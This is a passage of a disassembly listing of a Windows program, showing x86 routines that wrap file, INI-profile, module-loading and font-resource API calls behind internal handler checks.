mov [edx+14h], ecx
mov [edx+18h], eax
mov eax, [ebp+arg_8]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+arg_8]
mov eax, [eax+8]
mov [ecx+20h], eax
jmp short loc_49B9BD
; ---------------------------------------------------------------------------
loc_49B995: ; CODE XREF: sub_49B8AA+7B�j
push offset aKernel32_0 ; "kernel32"
push offset aGetfileattri_1 ; "GetFileAttributesExW"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_30], eax
cmp [ebp+var_30], 0
jz short loc_49B9BD
push [ebp+arg_8]
push 0
push [ebp+arg_0]
call [ebp+var_30]
mov [ebp+var_1C], eax
loc_49B9BD: ; CODE XREF: sub_49B8AA+E9�j
; sub_49B8AA+103�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49B9C8
jmp short loc_49B9D8
sub_49B8AA endp
; =============== S U B R O U T I N E =======================================
sub_49B9C8 proc near ; CODE XREF: sub_49B8AA+117�p
; DATA XREF: _5:0049FA90�o
mov eax, [ebp-20h]
mov [ebp-38h], eax
push dword ptr [ebp-38h]
call sub_4993DD
pop ecx
retn
sub_49B9C8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49B8AA
loc_49B9D8: ; CODE XREF: sub_49B8AA+11C�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_49B8AA
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49B9EC proc near ; CODE XREF: sub_4060D0+1F5�p
; sub_406A0D+38�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_491672
test eax, eax
jnz short loc_49BA11
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2700 ; GetFileSize
mov [ebp+var_4], eax
jmp short loc_49BA1D
; ---------------------------------------------------------------------------
loc_49BA11: ; CODE XREF: sub_49B9EC+12�j
cmp [ebp+arg_4], 0
jz short loc_49BA1D
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_49BA1D: ; CODE XREF: sub_49B9EC+23�j
; sub_49B9EC+29�j
mov eax, [ebp+var_4]
leave
retn 8
sub_49B9EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BA24 proc near ; CODE XREF: sub_405A58+18�p
; sub_407252+58�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_498141
add esp, 10h
test eax, eax
jnz short loc_49BA57
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2714 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_49BA57: ; CODE XREF: sub_49BA24+1F�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_49BA24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BA5E proc near ; DATA XREF: _6:004A23B0�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push edi
and [ebp+var_4], 0
mov eax, [ebp+arg_8]
inc eax
push eax
call sub_49935A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_8]
inc ecx
xor eax, eax
mov edi, [ebp+var_8]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_0]
call sub_498141
add esp, 10h
test eax, eax
jnz short loc_49BABF
push [ebp+arg_8]
push [ebp+var_8]
push [ebp+arg_0]
call ds:dword_4A2714 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_49BABF: ; CODE XREF: sub_49BA5E+4D�j
push [ebp+arg_8]
push [ebp+arg_4]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
mov eax, [ebp+var_8]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4993DD
pop ecx
mov eax, [ebp+var_4]
pop edi
leave
retn 0Ch
sub_49BA5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BAEB proc near ; DATA XREF: _6:004A23B8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4928CF
add esp, 10h
test eax, eax
jnz short loc_49BB36
push offset aKernel32_0 ; "kernel32"
push offset aGetlongpathnam ; "GetLongPathNameA"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_49BB36
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_49BB36: ; CODE XREF: sub_49BAEB+20�j
; sub_49BAEB+3A�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_49BAEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BB3D proc near ; DATA XREF: _6:004A23C0�o
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0049BC52 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FA98
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
mov eax, [ebp+arg_8]
inc eax
push eax
call sub_49935A
pop ecx
mov [ebp+var_30], eax
mov eax, [ebp+var_30]
mov [ebp+var_24], eax
mov ecx, [ebp+arg_8]
inc ecx
xor eax, eax
mov edi, [ebp+var_24]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 400h
call sub_49935A
pop ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_34]
mov [ebp+var_20], eax
and [ebp+var_4], 0
push 0
push 0
push 400h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
mov [ebp+var_28], eax
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push [ebp+var_24]
push [ebp+var_20]
call sub_4928CF
add esp, 10h
test eax, eax
jnz short loc_49BC0B
push offset aKernel32_0 ; "kernel32"
push offset aGetlongpathn_0 ; "GetLongPathNameW"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jz short loc_49BC09
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_2C]
mov [ebp+var_1C], eax
loc_49BC09: ; CODE XREF: sub_49BB3D+BB�j
jmp short loc_49BC28
; ---------------------------------------------------------------------------
loc_49BC0B: ; CODE XREF: sub_49BB3D+A1�j
mov eax, [ebp+var_1C]
cmp eax, [ebp+arg_8]
jnb short loc_49BC28
push [ebp+arg_8]
push [ebp+arg_4]
push 0FFFFFFFFh
push [ebp+var_24]
push 0
push 0
call ds:dword_4A2770 ; MultiByteToWideChar
loc_49BC28: ; CODE XREF: sub_49BB3D:loc_49BC09�j
; sub_49BB3D+D4�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49BC33
jmp short loc_49BC52
sub_49BB3D endp
; =============== S U B R O U T I N E =======================================
sub_49BC33 proc near ; CODE XREF: sub_49BB3D+EF�p
; DATA XREF: _5:0049FAA0�o
mov eax, [ebp-24h]
mov [ebp-38h], eax
push dword ptr [ebp-38h]
call sub_4993DD
pop ecx
mov eax, [ebp-20h]
mov [ebp-3Ch], eax
push dword ptr [ebp-3Ch]
call sub_4993DD
pop ecx
retn
sub_49BC33 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49BB3D
loc_49BC52: ; CODE XREF: sub_49BB3D+F4�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 0Ch
; END OF FUNCTION CHUNK FOR sub_49BB3D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BC66 proc near ; DATA XREF: _6:004A2370�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
xor edx, edx
mov ecx, [ebp+arg_14]
call sub_4929D2
test eax, eax
jz short loc_49BCE9
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_492CC4
add esp, 1Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_49BCE7
cmp [ebp+arg_8], 0
jz short loc_49BCE7
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+arg_8]
push [ebp+arg_C]
call sub_48D770
add esp, 0Ch
mov edi, [ebp+arg_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jnb short loc_49BCDB
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_49BCE1
; ---------------------------------------------------------------------------
loc_49BCDB: ; CODE XREF: sub_49BC66+6B�j
mov eax, [ebp+arg_10]
mov [ebp+var_C], eax
loc_49BCE1: ; CODE XREF: sub_49BC66+73�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
loc_49BCE7: ; CODE XREF: sub_49BC66+3A�j
; sub_49BC66+40�j
jmp short loc_49BD04
; ---------------------------------------------------------------------------
loc_49BCE9: ; CODE XREF: sub_49BC66+15�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2724 ; GetPrivateProfileStringA
mov [ebp+var_4], eax
loc_49BD04: ; CODE XREF: sub_49BC66:loc_49BCE7�j
mov eax, [ebp+var_4]
pop edi
leave
retn 18h
sub_49BC66 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BD0C proc near ; DATA XREF: _6:004A2378�o
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 58h
push edi
and [ebp+var_4], 0
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_4929D2
test eax, eax
jz short loc_49BD76
and [ebp+var_54], 0
push 13h
pop ecx
xor eax, eax
lea edi, [ebp+var_53]
rep stosd
stosw
stosb
push 0
push [ebp+arg_C]
push 50h
lea eax, [ebp+var_54]
push eax
push offset dword_4A2918
push [ebp+arg_4]
push [ebp+arg_0]
call sub_492CC4
add esp, 1Ch
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jnz short loc_49BD67
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
jmp short loc_49BD74
; ---------------------------------------------------------------------------
loc_49BD67: ; CODE XREF: sub_49BD0C+51�j
lea eax, [ebp+var_54]
push eax
call sub_48DA75
pop ecx
mov [ebp+var_4], eax
loc_49BD74: ; CODE XREF: sub_49BD0C+59�j
jmp short loc_49BD8B
; ---------------------------------------------------------------------------
loc_49BD76: ; CODE XREF: sub_49BD0C+19�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A271C ; GetPrivateProfileIntA
mov [ebp+var_4], eax
loc_49BD8B: ; CODE XREF: sub_49BD0C:loc_49BD74�j
mov eax, [ebp+var_4]
pop edi
leave
retn 10h
sub_49BD0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BD93 proc near ; DATA XREF: _6:004A2380�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_8]
call sub_4929D2
test eax, eax
jz short loc_49BDC5
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push 0
push 0
push 0
call sub_492CC4
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_49BDD7
; ---------------------------------------------------------------------------
loc_49BDC5: ; CODE XREF: sub_49BD93+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2720 ; GetPrivateProfileSectionNamesA
mov [ebp+var_4], eax
loc_49BDD7: ; CODE XREF: sub_49BD93+30�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_49BD93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BDDE proc near ; DATA XREF: _6:004A2388�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_4929D2
test eax, eax
jz short loc_49BE11
push 1
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push 0
push 0
push [ebp+arg_0]
call sub_492CC4
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_49BE26
; ---------------------------------------------------------------------------
loc_49BE11: ; CODE XREF: sub_49BDDE+12�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_49F02C ; GetPrivateProfileSectionA
mov [ebp+var_4], eax
loc_49BE26: ; CODE XREF: sub_49BDDE+31�j
mov eax, [ebp+var_4]
leave
retn 10h
sub_49BDDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BE2D proc near ; CODE XREF: sub_49BE83+8�p
; sub_49BE96+9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_49BE43
push 7Eh
call ds:dword_4A278C ; RtlRestoreLastWin32Error
xor eax, eax
jmp short locret_49BE81
; ---------------------------------------------------------------------------
loc_49BE43: ; CODE XREF: sub_49BE2D+8�j
mov ecx, [ebp+arg_0]
call sub_496AD2
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_49BE7E
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
call sub_4971E1
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_49BE7E
call ds:dword_4A2710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_49BE7A
push 7Eh
call ds:dword_4A278C ; RtlRestoreLastWin32Error
loc_49BE7A: ; CODE XREF: sub_49BE2D+43�j
xor eax, eax
jmp short locret_49BE81
; ---------------------------------------------------------------------------
loc_49BE7E: ; CODE XREF: sub_49BE2D+25�j
; sub_49BE2D+39�j
mov eax, [ebp+var_4]
locret_49BE81: ; CODE XREF: sub_49BE2D+14�j
; sub_49BE2D+4F�j
leave
retn
sub_49BE2D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BE83 proc near ; CODE XREF: sub_409037+5A�p
; sub_40981F+13A�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_49BE2D
pop ecx
pop ecx
pop ebp
retn 4
sub_49BE83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BE96 proc near ; CODE XREF: sub_49A518+B9�p
; sub_49A789+B9�p ...
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_49BE2D
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_49BE96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BEAA proc near ; CODE XREF: sub_49BF65+8�p
; sub_49BF78+9�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FAA8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_49BEE1
push 7Eh
call ds:dword_4A278C ; RtlRestoreLastWin32Error
xor eax, eax
jmp short loc_49BF56
; ---------------------------------------------------------------------------
loc_49BEE1: ; CODE XREF: sub_49BEAA+29�j
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
push 0
push 0
push 104h
push [ebp+var_1C]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
push [ebp+arg_4]
push [ebp+var_1C]
call sub_49BE2D
pop ecx
pop ecx
push 0FFFFFFFFh
mov [ebp+var_28], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_28]
jmp short loc_49BF56
; ---------------------------------------------------------------------------
loc_49BF44: ; DATA XREF: _5:0049FAB0�o
mov eax, [ebp+var_1C]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_4993DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_49BF56: ; CODE XREF: sub_49BEAA+35�j
; sub_49BEAA+98�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_49BEAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BF65 proc near ; DATA XREF: _6:004A22D8�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_49BEAA
pop ecx
pop ecx
pop ebp
retn 4
sub_49BF65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BF78 proc near ; DATA XREF: _6:004A22E8�o
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_49BEAA
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_49BF78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BF8C proc near ; CODE XREF: sub_40981F+F�p
; sub_40981F+264�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_49BFA0
push 0
call ds:dword_4A2718 ; GetModuleHandleA
jmp short locret_49BFC2
; ---------------------------------------------------------------------------
loc_49BFA0: ; CODE XREF: sub_49BF8C+8�j
push [ebp+arg_0]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_49BFBF
xor dl, dl
mov ecx, [ebp+arg_0]
call sub_4968CF
mov [ebp+var_4], eax
loc_49BFBF: ; CODE XREF: sub_49BF8C+24�j
mov eax, [ebp+var_4]
locret_49BFC2: ; CODE XREF: sub_49BF8C+12�j
leave
retn 4
sub_49BF8C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49BFC6 proc near ; DATA XREF: _6:004A2358�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0049C062 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FAB8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_49BFFB
push 0
call ds:dword_4A2718 ; GetModuleHandleA
jmp short loc_49C065
; ---------------------------------------------------------------------------
loc_49BFFB: ; CODE XREF: sub_49BFC6+29�j
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_49935A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4A27B8 ; WideCharToMultiByte
push [ebp+var_20]
call sub_49BF8C
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_49C052
jmp short loc_49C062
sub_49BFC6 endp
; =============== S U B R O U T I N E =======================================
sub_49C052 proc near ; CODE XREF: sub_49BFC6+85�p
; DATA XREF: _5:0049FAC0�o
mov eax, [ebp-20h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_4993DD
pop ecx
retn
sub_49C052 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49BFC6
loc_49C062: ; CODE XREF: sub_49BFC6+8A�j
mov eax, [ebp+var_1C]
loc_49C065: ; CODE XREF: sub_49BFC6+33�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_49BFC6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C076 proc near ; CODE XREF: sub_409037+71�p
; sub_409037+7E�p ...
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0049C179 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FAC8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
mov eax, [ebp+arg_4]
shr eax, 10h
movzx eax, ax
test eax, eax
jz short loc_49C0C9
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+arg_4]
call ds:dword_4A27C0 ; lstrcmpi
test eax, eax
jnz short loc_49C0C9
mov ecx, [ebp+arg_0]
call sub_496A41
loc_49C0C9: ; CODE XREF: sub_49C076+37�j
; sub_49C076+49�j
and [ebp+var_4], 0
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A2728 ; GetProcAddress
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_49C0F9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_30], 0
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_30]
jmp loc_49C17C
; ---------------------------------------------------------------------------
loc_49C0F9: ; CODE XREF: sub_49C076+6A�j
cmp [ebp+var_1C], 0
jz short loc_49C179
mov eax, ds:dword_4A70D4
mov [ebp+var_24], eax
cmp [ebp+var_24], 0
jz short loc_49C120
mov eax, [ebp+var_24]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_28], 1
jmp short loc_49C124
; ---------------------------------------------------------------------------
loc_49C120: ; CODE XREF: sub_49C076+95�j
and [ebp+var_28], 0
loc_49C124: ; CODE XREF: sub_49C076+A8�j
movzx eax, [ebp+var_28]
test eax, eax
jz short loc_49C179
mov [ebp+var_4], 1
push [ebp+var_1C]
mov ecx, ds:dword_4A70D4
call sub_49C871
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_49C152
mov eax, [ebp+var_20]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_49C152: ; CODE XREF: sub_49C076+D2�j
or [ebp+var_4], 0FFFFFFFFh
call sub_49C15D
jmp short loc_49C179
sub_49C076 endp
; =============== S U B R O U T I N E =======================================
sub_49C15D proc near ; CODE XREF: sub_49C076+E0�p
; DATA XREF: _5:0049FADC�o
mov eax, ds:dword_4A70D4
mov [ebp-2Ch], eax
cmp dword ptr [ebp-2Ch], 0
jz short locret_49C178
mov eax, [ebp-2Ch]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
locret_49C178: ; CODE XREF: sub_49C15D+C�j
retn
sub_49C15D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_49C076
loc_49C179: ; CODE XREF: sub_49C076+87�j
; sub_49C076+B4�j ...
mov eax, [ebp+var_1C]
loc_49C17C: ; CODE XREF: sub_49C076+7E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_49C076
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C18D proc near ; CODE XREF: sub_409037+170�p
; DATA XREF: _1:off_4240D4�o ...
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FAE0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
push [ebp+arg_0]
call ds:dword_4A26E0 ; FreeLibrary
jmp short loc_49C1D9
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 1
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
loc_49C1D9: ; CODE XREF: sub_49C18D+35�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_49C18D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C1EA proc near ; DATA XREF: _6:off_4A23D8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
mov eax, [ebp+arg_14]
and eax, 10h
test eax, eax
jz short loc_49C216
cmp [ebp+arg_8], 0
jnz short loc_49C216
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
call sub_490036
test eax, eax
jnz short loc_49C216
and [ebp+var_4], 0
loc_49C216: ; CODE XREF: sub_49C1EA+10�j
; sub_49C1EA+16�j ...
cmp [ebp+var_4], 0
jnz short loc_49C237
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4A27CC ; LoadImageA
mov [ebp+var_4], eax
loc_49C237: ; CODE XREF: sub_49C1EA+30�j
mov eax, [ebp+var_4]
leave
retn 18h
sub_49C1EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C23E proc near ; DATA XREF: _6:off_4A23C8�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_49F5C4
push offset aAddfontresou_0 ; "AddFontResourceA"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_49094C
test eax, eax
jnz short loc_49C270
push [ebp+arg_0]
call [ebp+var_8]
mov [ebp+var_4], eax
loc_49C270: ; CODE XREF: sub_49C23E+27�j
mov eax, [ebp+var_4]
leave
retn 4
sub_49C23E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49C277 proc near ; DATA XREF: _6:004A23D0�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset dword_49F5C4
push offset aRemovefontre_0 ; "RemoveFontResourceA"
call sub_49AC22
pop ecx
pop ecx
mov [ebp+var_8], eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_490D24
test eax, eax
jnz short loc_49C2A9
